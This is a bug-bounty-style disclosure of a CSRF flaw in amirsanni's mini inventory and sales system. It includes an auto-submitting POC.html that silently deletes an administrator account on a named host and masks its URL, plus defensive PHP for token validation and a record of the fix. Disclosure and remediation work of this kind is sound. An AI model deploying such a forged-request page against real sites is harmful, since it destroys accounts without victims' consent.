Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Sep 7th 2021


✍️ Description

An attacker can delete administrator accounts: if a logged-in administrator visits an attacker-controlled page, that page can submit the delete request in the victim's browser, which attaches the victim's session cookies, and the endpoint does not require a CSRF token that would tie the request to the genuine form.

🕵️‍♂️ Proof of Concept

1. While logged in to the application, open the POC.html below in a browser (Firefox and Safari were used).
2. The form submits itself on page load; afterwards you can check that the administrator account with _aId 396 was deleted without any action on your part.


//POC.html
<html>
  <body>
    <!-- Rewrite the visible URL to "/" so the address bar gives no hint of the attack page -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the vulnerable endpoint; the browser adds the victim's session cookie -->
    <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
      <!-- Only the target's id is needed; there is no CSRF token field to supply -->
      <input type="hidden" name="_aId" value="396" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Auto-submit so the victim does not have to click anything -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

A forged request makes a logged-in administrator delete an account without intending to. The attacker only needs the victim to load a page and needs to know (or guess) the target account's _aId.

💥 Test

Tested on Firefox and Safari.

💥 Fix

Require a per-session CSRF token in every state-changing request (here, the POST to administrators/delete) and validate it on the server before acting; a request whose token is missing or does not match must be rejected without touching the account. As defence in depth, set the session cookie with SameSite=Lax or Strict so the browser does not attach it to a cross-site form POST like the one in the PoC.
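The synchronizer-token pattern described above, as an added example that is not the project's own code. It is framework-agnostic PHP: the session is passed in as an array instead of using $_SESSION so the script runs stand-alone, and the names csrf_token, csrf_is_valid, handle_delete and the _csrf field are assumptions chosen for illustration, as are the constructed requests at the end.

```php
<?php
// Added example (not the project's code): synchronizer-token CSRF protection
// for a state-changing POST such as administrators/delete.
// Assumed names: csrf_token, csrf_is_valid, render_delete_form, handle_delete,
// and the hidden field "_csrf". $session stands in for $_SESSION.

declare(strict_types=1);

// Issue (or reuse) a per-session token. Called whenever a form is rendered.
function csrf_token(array &$session): string
{
    if (empty($session['_csrf'])) {
        // 32 bytes from the CSPRNG, hex-encoded so it is safe inside HTML.
        $session['_csrf'] = bin2hex(random_bytes(32));
    }
    return $session['_csrf'];
}

// Validate the token submitted with a state-changing request.
function csrf_is_valid(array $session, array $post): bool
{
    if (empty($session['_csrf']) || !isset($post['_csrf']) || !is_string($post['_csrf'])) {
        return false;
    }
    // Constant-time comparison so the token cannot be guessed via timing.
    return hash_equals($session['_csrf'], $post['_csrf']);
}

// Render the delete form with the token as a hidden field. An attacker's page
// on another origin cannot read this value, so it cannot forge the request.
function render_delete_form(array &$session, int $adminId): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form action="/administrators/delete" method="POST">'
         . '<input type="hidden" name="_csrf" value="' . $token . '">'
         . '<input type="hidden" name="_aId" value="' . $adminId . '">'
         . '<button type="submit">Delete</button></form>';
}

// Handler for POST /administrators/delete. $delete is the real deletion
// routine; it runs only after the token check passes. Returns an HTTP status.
function handle_delete(array $session, array $post, callable $delete): int
{
    if (!csrf_is_valid($session, $post)) {
        return 403;                       // forged or stale request: do nothing
    }
    if (!isset($post['_aId']) || !ctype_digit((string) $post['_aId'])) {
        return 400;                       // malformed id
    }
    $delete((int) $post['_aId']);
    return 200;
}

// --- Walk-through with constructed data (not captured traffic) -------------
$session = [];                                        // the victim's server-side session
$deleted = [];
$deleter = function (int $id) use (&$deleted): void { $deleted[] = $id; };

render_delete_form($session, 396);                    // legitimate page load issues the token

// 1. The attacker's POC.html knows _aId but cannot read the victim's token.
$status = handle_delete($session, ['_aId' => '396'], $deleter);
echo "forged request  -> $status, deleted: " . json_encode($deleted) . "\n";   // 403, []

// 2. A submission from the genuine form carries the matching token.
$status = handle_delete($session, ['_aId' => '396', '_csrf' => $session['_csrf']], $deleter);
echo "genuine request -> $status, deleted: " . json_encode($deleted) . "\n";   // 200, [396]
```

The check must run on the server for every request that changes state, not only on the form page, and the token must never be accepted from a GET parameter or a cookie alone (a cookie would be sent by the forged request too). If the application is built on a framework that ships its own CSRF middleware (an assumption about this project, which the report does not state), enabling that is preferable to hand-rolling the pattern above.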

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 3 months ago
Musio
3 months ago

Researcher


Hi, have you checked this report?

Amir validated this vulnerability 7 days ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 7 days ago
Amir has been awarded the fix bounty